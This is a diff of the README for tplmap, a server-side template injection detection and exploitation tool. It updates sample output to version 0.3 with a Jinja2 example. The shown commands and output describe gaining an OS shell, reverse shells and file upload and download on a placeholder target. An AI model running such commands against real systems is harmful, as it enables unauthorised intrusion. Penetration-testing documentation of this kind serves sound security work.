epinna/tplmap/README.md

 Exploitation
 ------------

-Tplmap supports the detection and exploitation of SSTI to get access to the underlying file system and operating system.
+Tplmap is able to detect and exploit SSTI in a range of template engine, including Jinja2, to get access to the underlying file system and operating system.
+Run it against the URL to test if the parameters are vulnerable.

 ```
 $ ./tplmap.py -u 'http://www.target.com/page?name=John'
-[+] Tplmap 0.2
+[+] Tplmap 0.3
     Automatic Server-Side Template Injection Detection and Exploitation Tool

 [+] Testing if GET parameter 'name' is injectable
 [+] Smarty plugin is testing rendering with tag '{*}'
 [+] Mako plugin is testing rendering with tag '${*}'
+...
 [+] Jinja2 plugin is testing rendering with tag '{{*}}'
-...
-[+] Nunjucks plugin is testing rendering with tag '{{*}}'
-[+] Nunjucks plugin has confirmed injection with tag '{{*}}'
+[+] Jinja2 plugin has confirmed injection with tag '{{*}}'
 [+] Tplmap identified the following injection point:

   GET parameter: name
-  Engine: Nunjucks
+  Engine: Jinja2
   Injection: {{*}}
   Context: text
   OS: linux
   Technique: render
   Capabilities:

    Shell command execution: yes
    Bind and reverse shell: yes
    File write: yes
    File read: yes
-   Code evaluation: yes, javascript code
+   Code evaluation: yes, python code

 [+] Rerun tplmap providing one of the following options:

     --os-shell                Run shell on the target
     --os-cmd                  Execute shell commands
     --bind-shell PORT         Connect to a shell bind to a target port
     --reverse-shell HOST PORT Send a shell back to the attacker's port
     --upload LOCAL REMOTE     Upload files to the server
     --download REMOTE LOCAL   Download remote files
 ```

 Use `--os-shell` option to compromise the target in a fully automated way.

 ```
 $ ./tplmap.py --os-shell -u 'http://www.target.com/page?name=John'
-[+] Tplmap 0.2
+[+] Tplmap 0.3
     Automatic Server-Side Template Injection Detection and Exploitation Tool

 [+] Run commands on the operating system.